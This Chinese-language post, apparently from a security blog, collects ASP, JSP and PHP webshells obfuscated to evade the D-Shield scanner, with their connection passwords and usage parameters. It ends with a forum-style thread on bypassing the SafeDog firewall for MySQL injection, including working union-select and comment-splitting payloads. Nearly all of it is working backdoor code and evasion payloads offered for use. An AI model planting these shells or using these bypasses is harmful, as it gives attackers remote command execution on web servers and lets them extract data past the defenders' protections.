过d盾小马分析/1

ASP

ASP连接密码均为99999

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<%
dim a(5)
a(0)=request("99999")
eXecUTe(a(0))
%>
<%
Function b():
b = request("99999")
End Function
Function f():
eXecUTe(b())
End Function
f()
%>
<%
Class zzz

private yyy
Private Sub Class_Initialize
yyy = ""
End Sub
public property let www(yyy)
execute(yyy)
end property

End Class

Set xxx= New zzz
dim vvv(7)
vvv(2)=request("99999")
xxx.www= vvv(2)
%>
<%
Function x():
x = request("99999")
End Function
y = Mid(x(),1)
z = y&""
eXecUTe(z)
%>
<%
Function x():
x = request("99999")
End Function
y = Left(x(),99999)
eXecUTe(y)
%>

JSP

jsp连接密码均为x

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String reverseStr(String str){String reverse = "";int length = str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) + reverse;}return reverse;}%>
<%
String x = request.getParameter("x");
if(x!=null){
Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj"));
Method gr = rt.getMethod(reverseStr("emitnuRteg"));
Method ex = rt.getMethod(reverseStr("cexe"), String.class);
Process e = (Process) ex.invoke(gr.invoke(null), x);
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("");
}
%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String plusStr(String str){String plus = "";int length = str.length();for (int i = 0; i < length; i++){char z = str.charAt(i);
if(z>='a'&&z<='w'){z=(char)(z+3);plus=plus+z;}
else if(z>='x'&&z<='z'){z=(char)(z-23);plus=plus+z;}
else{plus=plus+z;}}return plus;}
%>
<%
String x = request.getParameter("x");
if(x!=null){
Class rt = Class.forName(plusStr("gxsx.ixkd.Rrkqfjb"));
Method gr = rt.getMethod(plusStr("dbqRrkqfjb"));
Method ex = rt.getMethod(plusStr("bubz"), String.class);
Process e = (Process) ex.invoke(gr.invoke(null),x);
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("");
}
%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String eStr(String str){String result = "";int length = str.length();for (int i = 0; i < length; i++){char z=str.charAt(i);z=(char)(z-5);result=result+z;}return result;}%>
<%
if(request.getParameter("x")!=null){Class rt = Class.forName(eStr("of{f3qfsl3Wzsynrj"));
Process e = (Process) rt.getMethod(new String(eStr("j}jh")), String.class).invoke(rt.getMethod(new String(eStr("ljyWzsynrj"))).invoke(null, new Object[]{}), request.getParameter("x") );
java.io.InputStream in = e.getInputStream();int a = -1;byte[] b = new byte[2048];
out.print("");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("");}
%>
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!\u0070\u0075\u0062\u006c\u0069\u0063\u0020\u0073\u0074\u0061\u0074\u0069\u0063\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0065\u0078\u0063\u0075\u0074\u0065\u0043\u006d\u0064\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0029\u0020\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0020\u006c\u0069\u006e\u0065\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0020\u0070\u0072\u006f\u0020\u003d\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0063\u0029\u003b\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0020\u0062\u0075\u0066\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u006e\u0065\u0077\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u0070\u0072\u006f\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u0029\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0074\u0065\u006d\u0070\u0020\u003d\u0020\u006e\u0075\u006c\u006c\u003b\u0077\u0068\u0069\u006c\u0065\u0020\u0028\u0028\u0074\u0065\u006d\u0070\u0020\u003d\u0020\u0062\u0075\u0066\u002e\u0072\u0065\u0061\u0064\u004c\u0069\u006e\u0065\u0028\u0029\u0029\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u006c\u0069\u006e\u0065\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0074\u0065\u006d\u0070\u002b\u0022\u005c\u006e\u0022\u0029\u003b\u007d\u0062\u0075\u0066\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u006c\u0069\u006e\u0065\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0065\u002e\u0067\u0065\u0074\u004d\u0065\u0073\u0073\u0061\u0067\u0065\u0028\u0029\u0029\u003b\u007d\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006c\u0069\u006e\u0065\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u003b\u007d%><%\u0069\u0066\u0028\u0022\u0039\u0035\u0032\u0037\u0037\u0022\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0070\u0065\u0063\u0069\u0077\u0069\u0064\u0022\u0029\u0029\u0026\u0026\u0021\u0022\u0022\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0070\u0065\u0063\u0069\u0077\u0069\u0064\u0022\u0029\u0029\u0029\u007b\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u0022\u003c\u0070\u0072\u0065\u003e\u0022\u002b\u0065\u0078\u0063\u0075\u0074\u0065\u0043\u006d\u0064\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0063\u0066\u0074\u006d\u0069\u0064\u0022\u0029\u0029\u002b\u0022\u003c\u002f\u0070\u0072\u0065\u003e\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u007b\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u0022\u003a\u002d\u0029\u0022\u0029\u003b\u007d%>

使用方法:
?peciwid=95277&cftmid=id

PHP

php连接密码均为1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php 
$a=end($_REQUEST);
eval($a);
?>
<?php
$a = substr_replace("asse00","rt",4);
$b=array($array=array(''=>$a($_GET['1'])));
var_dump($b);
?>
<?php
/**
* assert($_GET[1+0]);
*/
class User { }
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$d = substr($comment , 14 , 20);
assert($d);
?>
<?php' v. N& N- O& ]; v9 N! m9 y: {; J
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[pwd]); // assert($_POST[_]);
?>

过安全狗waf思路:

师傅们,请教下关于mysql 注入bypass的问题。
目标为授权站点,需要拉数据,且数据量多。盲注好慢!!!
环境: linux Apache-Coyote mysql

看界面样式是安全狗,但html里面无safedog字样,应该是安全狗!
post注入点:

1
2
3
4
a=aaaaaa&post=1 '        报错
a=aaaaaa&post=1 ' order by 1 --+-正常
a=aaaaaa&post=1 ' order by 2 --+-报错
a=aaaaaa&post=1' || char_length(version())>4 --+-常规盲注, ture空白,false api接口有返回信息

已通过盲注获取到了基本信息

1
2
数据库版本        8.0.22
当前用户 *******(非root)@192.168.1.2

waf过滤了 一些关键词和 关键词组合

1
2
1、过滤了select 和from组合以及union select组合,以上组合,只要两个关键词同时出现,就会触发waf,如,如aasElecTbbgdffromgdgdf 就会触发waf,已fuzz各种空白字符组合(%0a %00.。。。。。。)
2、过滤了updatexml floor extractvalue 三个报错函数(不带括号),只要出现关键字就会触发waf,如aaaaupdatexmlfgfdgfd

绕过尝试:

1
2
3
4
5
6
7
8
9
10
1、post转multipart/form-data 也会触发waf,已经放弃
2、各种空白字符组合 如换行 回车什么的,内联注释同样放弃
3、一次、二次url编码 会触发waf
4、如post内容为空,get也会接受参数,但是waf同样会识别。
5、a=1&updatexml这种不会触发waf,尝试post a=aaaaaa&post=1' || /*&*/updatexml 以及 a=aaaaaa&post=1' || /*&*/char_length(version())>4 ,发现会把&之后的内容当第二个参数,带入不到sql
6、分段传输400
7、最近有遇到一个数字型注入存在安全狗,我是这么绕过的?id=1 /*&id =-1 union select 1,2,3,4%23*/测试的时候,发现/*& */这里面,不管输入什么关键字,都不会拦截,后面的%23是注释掉后面的*/,你可以试试(我在测试的时候,单独的union和单独的select这种,那个站的安全狗是不拦的,组合在一起才会拦截,不知道你是不是这种情况) 但是&后面要是匹配到=号 也会拦截!
8、 换行+空格
9、 mysql的内联注释
10、 分块传输绕